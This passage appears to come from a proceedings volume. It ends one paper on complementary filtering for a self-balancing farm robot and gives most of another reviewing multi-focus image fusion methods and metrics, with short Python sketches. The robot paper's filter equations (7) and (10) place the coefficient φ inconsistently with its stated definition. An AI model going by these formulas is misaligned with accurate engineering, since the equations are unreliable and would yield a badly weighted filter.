signal, analyse and read data encoded in the signal, convert it from one form to
another, and much more. Generally, these signals are classified in various categories
such as analog, digital, discrete-time, etc. An important process in this field is the filtering of signals [9]; as the name suggests, filtering is performed to obtain the required frequency range of the wave or signal passed through it. This is done to reduce or attenuate the effects of noise that gets added to the signal while it passes through several components of the device, and the device used in this process is a filter. There is no simple hierarchical classification of filters: they may be non-linear or linear, time-variant or time-invariant, causal or non-causal, analog or digital, passive or active, etc. A self-balancing robot requires a frequency filter circuit to improve the signal or data obtained from the sensor employed to measure the tilt angle [10]. This type of filter suppresses specific frequencies that are not required in the signal processing and that lead to noise.
These filters that discriminate signal based on the range of frequency can be
classified as low pass and high pass filters, that will be used further for processing
sensor data.
A low-pass filter [9, 11] efficiently rejects all the frequency ranges lying above the cut-off frequency, thus accepting only low-frequency ranges. From Fig. 4, we can
infer that the amplitude at frequencies w1 and w2 are equal, but once passed through
the filter there is a significant change as w2 reduces tremendously indicating that the
frequencies higher than wc were attenuated and w1 was allowed to pass through the
filter.
A high pass filter [9, 11] efficiently rejects all the frequency ranges lying below
the cut-off frequency thus accepting only high-frequency ranges. From Fig. 5, we can
infer that the amplitude at frequencies w1 and w2 are equal, but once passed through
the filter there is a significant change as w1 reduces tremendously indicating that the
frequencies lower than wc were attenuated and w2 was allowed to pass through the

Fig. 4 Low-pass filter (graphical representation)


Fig. 5 High-pass filter (graphical representation)

Fig. 6 Diagram for complementary filter

filter. A high-pass filter and a low-pass filter together form a complementary filter
which provides the functionality and features of both the filters.
In Fig. 6 given above, the signals x and y are the measurements of noise [12] in
a collective signal z which contains both x and y. Ẑ is the measurement of output
produced by the filter. Now let us assume that the y noise measurement represents
signals of high frequency and, x, on the other hand, represents a noise signal of
low frequency. So, to reduce these noises accordingly, y is made to pass through
a low-pass filter G(s) that accepts a low range of frequency, thus attenuating the
high-frequency noise signal. Further, the x noise signal is made to pass through a
complement of G(s) i.e., 1 − G(s), also known as a high pass filter to attenuate low-
frequency noise signals. Thus, a complementary filter intelligently reduces noise
depending upon the frequency of the signals. Now, the robot is equipped with a GY-87 device for studying the tilt and motion of the complete system. This device reads gyroscope data and accelerometer data for all three axes. The set of 12 values obtained is combined with the help of these filters to give the final result in terms of the tilt angle. The readings are obtained as follows (Fig. 7).
As the name suggests, an accelerometer is a device used to measure the rate of change of velocity of a system in its instantaneous domain. The accelerometer has a disadvantage in terms of its response time to a changing tilt angle, which is fairly slow. The gyroscope, on the other hand, uses angular velocity to calculate the shift in the inclination of the robot, but its value drifts rapidly over time.
Fig. 7 Readings obtained from the sensors

So, these two sensors show opposite behaviour to each other: the accelerometer fails to work correctly in the presence of gravity, while the gyroscope shows faulty readings when moving on plain ground. The complementary filter sorts and filters the data from both devices in such a way that the noise is reduced to a minimal value and accurate readings are obtained. The filter is implemented in the Arduino code in the form of equations. When the robot shows any change in its orientation, the GY-87 sensor produces values through the accelerometer and gyroscope; this data must then be processed to attenuate noise, which is done by the following equations. The equation for the high-pass filter is:

S(n) = (1 − φ).S(n − 1) + (1 − φ).(s(n) − s(n − 1)) (7)

Here, s(n) is the value from the gyroscope and S(n) is the actual angle that will be
used in the next cycle of the program. The above equation will determine your values
for the gyroscope.
The equation for low pass filter:

S (n) = (1 − φ) .s (n) + φ.S (n − 1) (8)

Here, s(n) is the value from the accelerometer and S(n) is the actual angle that will
be used in the next cycle of the program. The above equation will determine your
values for the accelerometer. Now, we combine the pitch values from these filters in the form of the complementary filter so as to generate the real-time tilt value of the robot. Although the accelerometer alone could have generated the pitch value, the addition of the gyroscope makes the robot able to move on all kinds of high and low surfaces and even on ramps. Hence, the pitch angle is:

data = tan⁻¹(arr[1] / abs(arr[2]))   (9)

Here, arr[1] is the value of the accelerometer for the y-axis and arr[2] is the value of the accelerometer for the z-axis. Combining this with the gyroscope value for the x-axis, the final equation of the complementary filter is as follows:
tilt = (1 − φ)(tilt + gyr ∗ dt) + φ(data) (10)

The coefficient φ can be calculated as:

φ = τ/(τ + dt)   (11)

where τ is the time constant and dt = 1/f_s, with f_s the sampling frequency.
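The paper implements these equations in the Arduino code; purely as an illustration, the same tilt-angle update of Eqs. (9)–(11) can be sketched in a few lines of Python. The time constant, sampling frequency, and sensor readings below are made-up values, not data from the GY-87 used in the paper.

import math

def complementary_tilt(tilt_prev, acc_y, acc_z, gyro_x, tau=0.5, fs=100.0):
    # Eq. (11): sampling period and filter coefficient
    dt = 1.0 / fs
    phi = tau / (tau + dt)
    # Eq. (9): pitch angle from the accelerometer y- and z-axis readings
    data = math.atan(acc_y / abs(acc_z))
    # Eq. (10): blend the integrated gyroscope rate with the accelerometer pitch
    return (1.0 - phi) * (tilt_prev + gyro_x * dt) + phi * data

# Example usage with made-up accelerometer (g) and gyroscope (rad/s) readings.
tilt = 0.0
for acc_y, acc_z, gyro_x in [(0.10, 0.99, 0.02), (0.12, 0.98, 0.01)]:
    tilt = complementary_tilt(tilt, acc_y, acc_z, gyro_x)
    print(round(tilt, 4))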

6 Conclusion

The research paper worked through the history of agriculture and explained the evolution of farming techniques that led to digitisation [13]. The application of IoT-based devices in this field is explained thoroughly, along with a detailed study of the benefits and advantages of the two-wheeler robot in cultivation. Further, we saw the system modelling through the inverted pendulum system, where the torque equation was used in the Euler-Lagrange rule to find the resultant rotational acceleration. The paper practically implemented the complementary filter by working through the concept of high-pass and low-pass filters. The mathematical equations for the two were determined and combined to find the tilt angle. The GY-87 sensor data used to calculate the tilt angle had minimal noise due to these filters. Finally, the controller opted for the robot's balancing is the linear quadratic regulator, described briefly.

References

1. Zhang, W. (2011). Study about IOT’s application in “Digital Agriculture” construction. In


2011 International Conference on Electrical and Control Engineering. https://doi.org/10.1109/
iceceng.2011.6057405
2. Siradjuddin, I., Amalia, Z., Setiawan, B., Ronilaya, F., Rohadi, E., Setiawan, A., Rahmad, C., & Adhisuwignjo, S. Stabilising a cart inverted pendulum with an augmented PID control scheme. Electrical Engineering Department and Information Technology Department, State Polytechnic of Malang, Malang, Indonesia.
3. Kim, Y., Kim, S. H., & Kwak, Y. K. (2005). Dynamic analysis of a nonholonomic two-wheeled inverted pendulum robot. Journal of Intelligent and Robotic Systems, 44, 25–46. Department of Mechanical Engineering, KAIST, Daejeon, South Korea. https://doi.org/10.1007/s10846-005-9022-4
4. Ruan, X., & Li, W. (2014). Ultrasonic sensor based two-wheeled self-balancing robot obsta-
cle avoidance control system. In 2014 IEEE International Conference on Mechatronics and
Automation, Tianjin, pp. 896–900. https://doi.org/10.1109/ICMA.2014.6885816.
5. Madhira, K., Gandhi, A., & Gujral, A. (2016). In 2016 International Conference on Electrical, Electronics, and Optimization Techniques (ICEEOT), Chennai, India, 3–5 March 2016.
6. Krishna, B. S. B. V., & Rao, P. M. (2016). Implementation of two wheeled self balancing
platform.
7. Fernández de Cañete, J., Galindo, C., & Moral, I. G. (2011). In Introduction to Control Systems.
System Engineering and Automation, pp. 137–165. https://doi.org/10.1007/978-3-642-20230-
8_5.
8. Stanese, M., Susca, M., Mihaly, V., & Nascu, I. (2020). Design and control of a self-balancing
robot. In 2020 IEEE International Conference on Automation, Quality and Testing, Robotics
(AQTR). https://doi.org/10.1109/aqtr49680.2020.9129935
9. Kolawole, E. S., Ali, W. H., Cofie, P., Fuller, J., Tolliver, C., & Obiomon, P. (2015). Design
and implementation of low-pass, high-pass and band-pass finite impulse response (FIR) filters
using FPGA. Circuits and Systems, 6, 30–48.
10. González, C., Alvarado, I., & Muñoz de la Peña, D. (2017). Low cost two-wheels self-balancing robot for control education. IFAC-PapersOnLine, 50(1), 9174–9179. https://doi.org/10.1016/j.ifacol.2017.08.1729
11. Ochala, I., Gbaorun, F., & Okeme, I. C. Design and implementation of a filter for low-noise applications. Department of Physics, Kogi State University, Anyigba; Department of Physics, Benue State University, Makurdi.
12. Higgins, W. (1975). A comparison of complementary and Kalman filtering. IEEE Transactions
on Aerospace and Electronic Systems, AES-11(3), 321–325. https://doi.org/10.1109/taes.1975.
308081
13. Tang, S., Zhu, Q., Zhou, X., Liu, S., & Wu, M. (n.d.). A conception of digital agriculture.
In IEEE International Geoscience and Remote Sensing Symposium. https://doi.org/10.1109/
igarss.2002.1026858
14. Molnar, J., Gans, S., & Slavko, O. (2020). Design and implementation self-balancing robot.
In 2020 IEEE Problems of Automated Electrodrive. Theory and Practice (PAEP). https://doi.
org/10.1109/paep49887.2020.9240815
15. Self-balancing robot modeling and control using two degree of freedom PID controller. In Proceedings of the International Conference on Advanced Intelligent Systems and Informatics 2018, Advances in Intelligent Systems and Computing, Vol. 845 (pp. 64–76). https://doi.org/10.1007/978-3-319-99010-1_6
Study and Performance Analysis
of Image Fusion Techniques
for Multi-focus Images

Vineeta Singh and Vandana Dixit Kaushik

Abstract The primary objective behind image fusion technique is to collect and
integrate all the essential as well as relevant features and information in a solitary
image. In case of multi-focus image fusion technique, the procedure involves accu-
mulation of information out of the focused regions from the input images and final
combined outcome (image) will contain all the focused regions as well as objects.
There have been several studies in regard to multi-focus image fusion technique in
the area of spatial domain as well as transform domain. The issue of appearance of
non-focused regions or objects in an image arises due to the limited depth of field of the camera lens. As a result, objects present in the focused region of the camera lens appear focused and others appear unfocused. The image fusion technique is a scheme to overcome this issue. In this paper, the authors have reviewed recent fusion-based techniques and tested certain image fusion techniques, namely discrete wavelet transform (DWT), independent component analysis (ICA), sparse representation (SR), dual-tree complex wavelet transform (DTCWT), and non-subsampled contourlet transform (NSCT), together with a hybrid of NSCT + SR, on the Lytro multi-focus image dataset, and comparatively analyzed these methods on the fusion metrics nonlinear correlation information entropy (NCIE), normalized mutual information (NMI), gradient-based metric (GBM), and phase congruency-based metric (PCB). The analysis has demonstrated that NSCT + SR gives the best performance results, with an NCIE of 0.842, NMI of 1.121, GBM of 0.759, and PCB of 0.848, while the SR method gives the second best performance. The authors have also elucidated the essential requirements to consider while framing any fusion-based scheme.

Keywords Image fusion techniques · DWT · ICA · DTCWT · SR · NSCT · Performance analysis · NCIE · GBM · NMI · PCB · Multi-focus images · Multi-focus image fusion techniques · Multi-focus image fusion

V. Singh (B) · V. D. Kaushik


Department of Computer Science and Engineering, Harcourt Butler Technical University, HBTU
East Campus, Nawabganj, Kanpur 208002, Uttar Pradesh, India
e-mail: vineeta.singh.cs@gmail.com
V. D. Kaushik
e-mail: vdkaushik@hbtu.ac.in


fusion

Abbreviations

cA Coefficient of approximation
cH Horizontal component
cV Vertical component
cD Diagonal component

1 Introduction and Background of the Work

The limited depth of field of a camera creates a hurdle in capturing all objects in focus at the same time. This is why a picture sometimes is not fully focused, i.e., it contains some objects that are blurred or out of focus [1–5]. This is the point where the need for multi-focus image fusion arises. Similarly, in the medical field, there are high-cost instruments to capture modalities of human organs, but these also have limitations; to avoid the high cost of medical imaging, the fusion concept has an important role to play here as well, so that medical practitioners and radiologists are able to diagnose a disease accurately [6, 7]. A fused modality image will possess all the required pertinent information. Image fusion application areas include microscopic imaging, medical imaging, remote sensing, and geographical imaging [8–13].
In the remote sensing area, a satellite is utilized to analyze and examine a remote location; for example, an earthquake-affected area is examined for the estimation and detection of damage. During research and development, it has been found that image processing in different fields also requires high-resolution as well as spectral images [14–16]. Therefore, images taken by various satellites, for example SPOT PAN, undergo an image fusion procedure to obtain a high-resolution image [16–19]. Different types of cameras capture different kinds of images; for instance, infrared cameras produce pictures lying in the infrared spectrum, while digital cameras produce images lying in the visible spectrum. Both kinds of sensors produce images complementary to one another; for surveillance purposes, for example, better analysis can be accomplished using both kinds of image information. Therefore, the concept of image fusion plays a very important role for analysis and understanding purposes [20–22]. Application areas also include human perception, computer vision, and machine perception, and the image fusion concept also minimizes the cost of image transmission [8, 23, 24]. The cost of image transmission is minimized by transmitting a single fused image in place of different images having different focus areas of a similar scene. Various image fusion schemes have been proposed in the image processing research field [25–32].
Fig. 1 Multi-focus image fusion sample diagram

In this research paper, the authors have reviewed recent research papers on multi-focus image fusion schemes, and their effectiveness has been evaluated with performance metrics. Figure 1 illustrates a sample diagram of the multi-focus image fusion concept.

2 Image Fusion Techniques and Effectiveness Criteria

In the literature, different algorithms exist to execute the image fusion model, where certain conditions need to be followed to produce effective results [24, 33, 34]:
• Important information from the source images should be preserved.
• Irrelevant information should be minimized or omitted from the fused image.
• Inconsistencies should not be the part of the fused image.
• Noise should be minimum or omitted from the final fused image.
Image fusion schemes are mainly classified into two categories: transform domain and spatial domain [20, 35, 36]. Spatial domain fusion schemes are implemented directly on the pixel values. Localized spatial features of an image include pixels or regions in the image, and these are the main fusion pillars in the case of spatial domain fusion schemes [20, 32, 34, 37–52]. In the spatial domain fusion procedure, focused regions taken from the input images are taken into consideration; these may
be in terms of pixels or features depicting the focused part of the image. There are focus measures to categorize the focused regions of the input images, such as Laplacian energy and spatial frequency. Spatial domain fusion schemes are further classified into three categories: decision-level fusion schemes, pixel-level fusion schemes, and feature-level fusion schemes [53–57].
In the case of image fusion schemes relying on the transform domain, transform coefficients are generated from the source images [18, 32]. Fusion of these coefficients is then carried out to obtain the final image coefficients, and the inverse transform is applied to get the final fused image. Transform domain-based fusion schemes include the discrete cosine transform [58] and wavelet transformation [29, 59, 60]. The transform domain has better fusion capabilities than spatial domain methods, because transform domain fusion schemes represent salient features more accurately and clearly. Depending on the kind of transform technique consumed, these schemes may be categorized as wavelet-based fusion schemes [24, 28, 59, 61–66], discrete cosine transform-based fusion schemes [22, 58, 67, 68], and curvelet transform-based fusion schemes [18, 66].

3 Some Current Image Fusion Techniques

3.1 Discrete Wavelet Transform

In DWT-based fusion, two input images are taken, the wavelet transform is applied to each, the transform coefficients are fused, and the inverse DWT is applied to produce the final fused image. The DWT mainly generates two parts: an approximation part and a detail part. For instance, in MATLAB, [cA, cH, cV, cD] = dwt2(X, wname) calculates the single-level 2-D discrete wavelet transform, where X denotes the input data and wname the wavelet name; dwt2 returns cA (the approximation coefficients matrix) and cH, cV, and cD (the detail coefficients matrices) representing the horizontal, vertical, and diagonal details, respectively.
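As an illustrative sketch only (not the authors' implementation), the same single-level DWT fusion idea can be written in Python with the PyWavelets library, here using simple averaging of the approximation coefficients and maximum-absolute selection of the detail coefficients as the fusion rule:

import numpy as np
import pywt

def dwt_fuse(img_a, img_b, wavelet="db1"):
    # Single-level 2-D DWT of each grayscale source image
    cA1, (cH1, cV1, cD1) = pywt.dwt2(img_a, wavelet)
    cA2, (cH2, cV2, cD2) = pywt.dwt2(img_b, wavelet)

    # Fuse the approximation part by averaging, the detail parts by max-absolute selection
    fuse = lambda x, y: np.where(np.abs(x) >= np.abs(y), x, y)
    coeffs = (0.5 * (cA1 + cA2), (fuse(cH1, cH2), fuse(cV1, cV2), fuse(cD1, cD2)))

    # Inverse DWT gives the fused image
    return pywt.idwt2(coeffs, wavelet)

# Example usage with random arrays standing in for two registered source images.
a = np.random.rand(64, 64)
b = np.random.rand(64, 64)
print(dwt_fuse(a, b).shape)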

3.2 Discrete Cosine Transform (DCT)

The frequency domain is utilized here to fuse the images. Under this category, image fusion methods based on averaging measures are considered. In the advanced DCT methodology, an enhanced version of the direct DCT-based image fusion model is obtained from the DCT representation of the fused image: the images are decomposed into blocks, the DCT representation of each block is computed, and the fused representation is obtained by averaging the DCT representations of the corresponding blocks. At last, by taking the inverse discrete cosine transform, the final fused image is obtained. This image fusion strategy is known as the modified or "enhanced" DCT technique.
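A minimal sketch of this block-wise DCT averaging idea is given below (assumptions: grayscale images, 8 × 8 blocks, and image dimensions divisible by the block size; this is only an illustration of the scheme, not the authors' exact code):

import numpy as np
from scipy.fft import dctn, idctn

def dct_average_fuse(img_a, img_b, block=8):
    # Fuse two equal-size grayscale images by averaging block-wise DCT coefficients
    h, w = img_a.shape
    out = np.zeros((h, w), dtype=float)
    for i in range(0, h, block):
        for j in range(0, w, block):
            da = dctn(img_a[i:i + block, j:j + block], norm="ortho")
            db = dctn(img_b[i:i + block, j:j + block], norm="ortho")
            # average the DCT representations of the corresponding blocks, then invert
            out[i:i + block, j:j + block] = idctn(0.5 * (da + db), norm="ortho")
    return out

# Example usage with random arrays standing in for two source images.
a = np.random.rand(64, 64)
b = np.random.rand(64, 64)
print(dct_average_fuse(a, b).shape)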
3.3 Curvelet Transform

The curvelet transform is an enhancement of the wavelet transform. The image fusion process using the curvelet transform involves the following steps:
• Register input images.
• Analyze each of the input images and generate the curvelet coefficients.
• Use maximum frequency rule to fuse the curvelet coefficients.
• Use inverse curvelet transform to obtain the final fused image.

3.4 Non-Subsampled Contourlet Transform

In this technique, each image is decomposed into low-frequency components as well as high-frequency components. According to the frequency components, the two input images are fused with each other via directive contrast in the case of the high frequencies and phase congruency in the case of the low frequencies. The final fused image is yielded after applying the inverse non-subsampled contourlet transform (inverse NSCT).

3.5 Sparse-Based Image Fusion Scheme

The sparse-based image fusion model works in the following manner: the input image signals are represented as a linear combination of a few elements from a pre-trained dictionary, where the sparse coefficients describe the input image characteristics. The steps can be summarized as follows (an illustrative sketch follows the list):
(i) Input images are broken down into overlapping patch segments, and every
patch is rewritten as a vector.
(ii) Sparse representation operation is done on input image patches via trained
dictionaries.
(iii) Apply some fusion method and fuse the sparse representation segments.
(iv) Produce the final fused output image with the help of the fused sparse representations.
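To make these steps concrete, a highly simplified Python sketch is given below. It assumes a grayscale image pair, uses a random unit-norm dictionary in place of a properly pre-trained one, orthogonal matching pursuit from scikit-learn for the sparse coding, and a max-L1 activity rule for fusion; it only illustrates the pipeline and is not the authors' implementation.

import numpy as np
from sklearn.decomposition import sparse_encode
from sklearn.feature_extraction.image import (extract_patches_2d,
                                              reconstruct_from_patches_2d)

def sparse_fuse(img_a, img_b, patch=8, n_atoms=128, k=5, seed=0):
    # (i) break both images into overlapping patches and vectorize them
    pa = extract_patches_2d(img_a, (patch, patch)).reshape(-1, patch * patch)
    pb = extract_patches_2d(img_b, (patch, patch)).reshape(-1, patch * patch)

    # a random unit-norm dictionary stands in for a pre-trained one (assumption)
    rng = np.random.default_rng(seed)
    D = rng.standard_normal((n_atoms, patch * patch))
    D /= np.linalg.norm(D, axis=1, keepdims=True)

    # (ii) sparse-code every patch with OMP against the dictionary
    ca = sparse_encode(pa, D, algorithm="omp", n_nonzero_coefs=k)
    cb = sparse_encode(pb, D, algorithm="omp", n_nonzero_coefs=k)

    # (iii) fusion rule: per patch, keep the code with the larger L1 activity
    pick_a = np.abs(ca).sum(axis=1) >= np.abs(cb).sum(axis=1)
    fused = np.where(pick_a[:, None], ca, cb)

    # (iv) rebuild patches from the fused codes and average the overlapping patches
    patches = (fused @ D).reshape(-1, patch, patch)
    return reconstruct_from_patches_2d(patches, img_a.shape)

# Example usage with random arrays standing in for two source images.
a = np.random.rand(32, 32)
b = np.random.rand(32, 32)
print(sparse_fuse(a, b).shape)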

3.6 DTCWT

A fusion-based technique was developed in [69] which relied on the DTCWT, i.e., the dual-tree complex wavelet transform. It has advantages over the traditional DWT in terms of shift invariance and directional selectivity.
3.7 ICA

ICA stands for independent component analysis [70]. In the ICA-based image fusion technique, images are decomposed using ICA bases. A sliding window technique is used to break the source images into patches, and every patch is transformed into the ICA domain. The transform coefficients are then combined to generate the fused patches. Finally, the fused output image is created by calculating the average of the overlapping image patches.

4 Evaluation Metrics

Fusion metrics, also known as evaluation metrics, are utilized to assess the effectiveness of fusion techniques. Some of these metrics are illustrated below.

4.1 Normalized Mutual Information (NMI)

A normalized mutual information metric was devised in [71] as an enhanced version of the traditional MI metric; it is given by the following equation:

NMI = 2 \left[ \frac{MI(P, F)}{E(P) + E(F)} + \frac{MI(Q, F)}{E(Q) + E(F)} \right] \qquad (1)

where E(P) denotes the entropy of image P and MI(P, Q) the mutual information between images P and Q. Here, P and Q are the two input images and F is the fused output image.
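As an illustration of Eq. (1), the sketch below computes NMI for 8-bit grayscale images from joint histograms (assumptions: 256-bin histograms and base-2 logarithms; this follows the standard definition above, not any specific code of the paper).

import numpy as np

def entropy(img, bins=256):
    p = np.histogram(img, bins=bins, range=(0, 256))[0].astype(float)
    p /= p.sum()
    p = p[p > 0]
    return -np.sum(p * np.log2(p))

def mutual_info(x, y, bins=256):
    pxy = np.histogram2d(x.ravel(), y.ravel(), bins=bins,
                         range=[[0, 256], [0, 256]])[0]
    pxy /= pxy.sum()
    px = pxy.sum(axis=1, keepdims=True)
    py = pxy.sum(axis=0, keepdims=True)
    nz = pxy > 0
    return np.sum(pxy[nz] * np.log2(pxy[nz] / (px @ py)[nz]))

def nmi(p_img, q_img, f_img):
    # Eq. (1): NMI = 2 [ MI(P,F)/(E(P)+E(F)) + MI(Q,F)/(E(Q)+E(F)) ]
    return 2 * (mutual_info(p_img, f_img) / (entropy(p_img) + entropy(f_img))
                + mutual_info(q_img, f_img) / (entropy(q_img) + entropy(f_img)))

# Example usage with random 8-bit images standing in for the inputs and the fused result.
P = np.random.randint(0, 256, (64, 64))
Q = np.random.randint(0, 256, (64, 64))
F = (P + Q) // 2
print(round(nmi(P, Q, F), 3))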

4.2 Nonlinear Correlation Information Entropy (NCIE)

Proposed by [72], this is a performance metric relying on information theory, and it is represented as:

NCIE = 1 + \sum_{a=1}^{3} \frac{\lambda_a}{3} \log_{256} \frac{\lambda_a}{3} \qquad (2)

where \lambda_a, a \in \{1, 2, 3\}, are the eigenvalues of the nonlinear correlation matrix M.
M = \begin{bmatrix} 1 & NCC_{PQ} & NCC_{PF} \\ NCC_{QP} & 1 & NCC_{QF} \\ NCC_{FP} & NCC_{FQ} & 1 \end{bmatrix} \qquad (3)

where NCC_{PQ} denotes the nonlinear correlation coefficient between images P and Q [53].

4.3 Gradient-Based Metric (GBM)

This fusion metric is based on image features and was proposed by [73]. It measures to what extent the gradient information of the input images has been transferred to the fused output image. It is expressed as:

GBM = \frac{\sum_{i=1}^{H} \sum_{j=1}^{W} \left[ Q^{MF}(i, j)\, w_M(i, j) + Q^{NF}(i, j)\, w_N(i, j) \right]}{\sum_{i=1}^{H} \sum_{j=1}^{W} \left[ w_M(i, j) + w_N(i, j) \right]} \qquad (4)

where the size of the image is H × W. Here Q^{MF}(i, j) = Q_g^{MF}(i, j)\, Q_h^{MF}(i, j), where Q_g^{MF}(i, j) and Q_h^{MF}(i, j) represent the edge-strength and orientation-related information preserved in the final fused image F from the input image M, respectively; Q^{NF}(i, j) is defined in a similar way. The weights w_M(i, j) and w_N(i, j) express the importance of Q^{MF}(i, j) and Q^{NF}(i, j), respectively.

4.4 Phase Congruency-Based Metric (PCB)

This metric was proposed by [74]. It is a performance metric relying on image features, namely image phase congruency; information about image edges and corners is its important component. The metric is expressed as the product of three correlation coefficients:

PCB = (P_p)^i (P_M)^j (P_m)^k \qquad (5)

where p, M, and m denote the phase congruency and the maximum and minimum moments, respectively. P_p, P_M, and P_m represent the highest correlation coefficients between the fused output image and the input images along with their maximum-selected map, and i, j, and k are exponential parameters used to adjust the importance of the three components.
Fig. 2 12 pairs of test images [75]

5 Experimental Setup and Simulation of Work

5.1 Experimental Setup

The experimental setup involved the Windows 10 OS, MATLAB software for simulation of the results, an Intel i3 microprocessor, and 2 GB of RAM. The Lytro multi-focus dataset [75] has 20 pairs of color multi-focus images and 4 series of multi-focus images with three images in each set. Figure 2 depicts 12 test image pairs taken from the Lytro multi-focus color image standard dataset, which is publicly available online; the size of each image is 520 × 520.

5.2 Comparative Discussion

Illustrated as following:

5.3 Comparative Analysis

Figure 3a–d shows the graphical analysis of the compared methods for NCIE, NMI, GBM, and PCB, respectively. It is evident from Fig. 3a–d that, for the NCIE, NMI, GBM, and PCB fusion metrics, the NSCT + SR method has shown the best performance while SR has shown the second best performance out of the methods listed in Table 1.
Fig. 3 a Comparative analysis via NCIE metric. b Comparative analysis via NMI metric.
c Comparative analysis via GBM metric. d Comparative analysis via PCB metric

Table 1 Comparative analysis for “image 5” from the Lytro multi-focus dataset [75]

S. No.  Metrics  DWT    ICA    DTCWT  SR     NSCT   NSCT+SR
1       NCIE     0.827  0.829  0.831  0.838  0.831  0.842
2       NMI      0.902  0.915  0.941  1.098  0.953  1.121
3       GBM      0.736  0.736  0.745  0.756  0.746  0.759
4       PCB      0.812  0.821  0.833  0.839  0.835  0.848

6 Conclusion and Future Scope

In this paper, the authors have reviewed recent fusion-based techniques and tested recent image fusion techniques, i.e., discrete wavelet transform (DWT), independent component analysis (ICA), dual-tree complex wavelet transform (DTCWT), sparse representation (SR), non-subsampled contourlet transform (NSCT), and a hybrid of NSCT+SR, on the Lytro multi-focus image dataset, and comparatively analyzed these methods on the fusion metrics nonlinear correlation information entropy (NCIE), normalized mutual information (NMI), gradient-based metric (GBM), and phase congruency-based metric (PCB). The analysis has demonstrated that NSCT+SR gives the best performance results (shown in dark blue color font) with an NCIE of 0.842, an NMI of 1.121, a GBM of 0.759, and a PCB of 0.848, while the SR method gives the second best performance (shown in red color font). The authors have also elucidated the essential requirements to consider while framing any fusion-based scheme. In the future, further hybrid approaches can be tested and analyzed to compare the performance results of multi-focus image fusion techniques.

References

1. Xiao, B., Ou, G., Tang, H., Bi, X., & Li, W. (2020). Multi-focus image fusion by hessian
matrix-based decomposition. IEEE Transactions Multimedia, 22, 285–297.
2. Wan, T., Zhu, C., & Qin, Z. (2013). Multifocus image fusion based on robust principal
component analysis. Pattern Recognition Letter, 34, 1001–1008.
3. Guo, X., Nie, R., Cao, J., Zhou, D., Mei, L., & He, K. (2019). Fuse GAN: Learning to fuse multi-
focus image via conditional generative adversarial network. IEEE Transaction Multimedia, 21,
1982–1996.
4. Zhang, Q., & Guo, B.-L. (2009). Multifocus image fusion using the nonsubsampled contourlet
transform. IEEE Transactions on Signal Processing, 89, 1334–1346.
5. Kou, F., Wei, Z., Chen, W., Wu, X., Wen, C., & Li, Z. (2018). Intelligent detail enhancement
for exposure fusion. IEEE Transaction Multimedia, 20, 484–495.
6. Laganà, M. M., Preti, M. G., Forzoni, L., D’Onofrio, S., De Beni, S., Barberio, A., Pietro, C., &
Baselli, G. (2013). Transcranial ultrasound and magnetic resonance image fusion with virtual
navigator. IEEE Transaction Multimedia, 15, 1039–1048.
7. Wang, T., Chiu, C., Wu, W., Wang, J., Lin, C., Chiu, C., & Liou, J. (2015). Pseudo-multiple-
exposure-based tone fusion with local region adjustment. IEEE Transaction Multimedia, 17,
470–484.
8. Amin-Naji, M., & Aghagolzadeh, A. (2018). Multi-focus image fusion in DCT domain using
variance and energy of laplacian and correlation coefficient for visual sensor networks. Journal
of AI Data Mining, 6, 233–250.
9. Dou, W. (2018). Image degradation for quality assessment of pan-sharpening methods. Remote
Sensing, 10, 154.
10. Li, H., Jing, L., Tang, Y., & Wang, L. (2018). An image fusion method based on image
segmentation for high-resolution remotely-sensed imagery. Remote Sensing, 10, 790.
11. Li, Q., Yang, X., Wu, W., Liu, K., & Jeon, G. (2018). Multi-focus image fusion method for
vision sensor systems via dictionary learning with guided filter. Sensors, 18, 2143.
12. Cao, T., Dinh, A., Wahid, K. A., Panjvani, K., & Vail, S. (2018). Multi-focus fusion technique on low-cost camera images for canola phenotyping. Sensors, 18, 1887.
13. Ganasala, P., & Kumar, V. (2014). Multimodality medical image fusion based on new features
in NSST domain. Biomedical Engineering Letters, 4, 414–424.
14. Du, J., Li, W., & Tan, H. (2019). Intrinsic image decomposition-based grey and pseudo-color
medical image fusion. IEEE Access, 7, 56443–56456.
15. Hu, H., Wu, J., Li, B., Guo, Q., & Zheng, J. (2017). An adaptive fusion algorithm for visible
and infrared videos based on entropy and the cumulative distribution of gray levels. IEEE
Transaction Multimedia, 19, 2706–2719.
16. Borsoi, R. A., Imbiriba, T., & Bermudez, J. C. M. (2020). Super-resolution for hyperspectral
and multispectral image fusion accounting for seasonal spectral variability. IEEE Transactions
on Image Processing, 29, 116–127.
17. Shao, Z., & Cai, J. (2018). Remote sensing image fusion with deep convolutional neural network. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing, 11, 1656–1669.
18. Yang, B., & Li, S. (2010). Multifocus image fusion and restoration with sparse representation.
IEEE Transactions on Instrumentation and Measurement, 59, 884–892.
19. Merianos, I., & Mitianoudis, N. (2019). Multiple-exposure image fusion for HDR image
synthesis using learned analysis transformations. Journal of Imaging, 5, 32.
20. Liu, Y., Chen, X., Ward, R. K., & Wang, Z. J. (2016). Image fusion with convolutional sparse
representation. IEEE Transactions on Signal Processing, 23, 1882–1886.
21. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8, 131–142.
22. Kumar, B. K. S. (2013). Multifocus and multispectral image fusion based on pixel significance
using discrete cosine harmonic wavelet transform. Signal Image Video Process., 7, 1125–1143.
23. Rahman, M. A., Lin, S. C. F., Wong, C. Y., Jiang, G., Liu, S., & Kwok, N. (2016). Efficient
colour image compression using fusion approach. Imaging Science Journal, 64, 166–177.
24. Naidu, V. P. S., & Raol, J. R. (2008). Pixel-level image fusion using wavelets and principal
component analysis. Defence Science Journal, 58, 338–352.
25. Burt, P., & Adelson, E. (1983). The laplacian pyramid as a compact image code. IEEE
Transactions on Communications, 31, 532–540.
26. Adelson, E. H., Anderson, C. H., Bergen, J. R., Burt, P. J., & Ogden, J. M. (1984). Pyramid
methods in image processing. RCA Engineering, 29, 33–41.
27. Zhao, W., Lu, H., & Wang, D. (2018). Multisensor image fusion and enhancement in spectral
total variation domain. IEEE Transaction Multimedia, 20, 866–879.
28. Rockinger, O. (1997). Image sequence fusion using a shift-invariant wavelet transform. In
Proceedings of the International Conference on Image Processing (Vol. 3, pp. 288–291). Santa
Barbara.
29. Li, H., Manjunath, B., & Mitra, S. (1995). Multisensor image fusion using the wavelet
transform. Graphical Models Image Processing, 57, 235–245.
30. Tian, P., & Ni, G. (2009). Contrast-based image fusion using the discrete wavelet transform.
Optical Engineering, 39, 2075–2082.
31. Wang, W. W., Shui, P. L., & Feng, X. C. (2008). Variational models for fusion and denoising
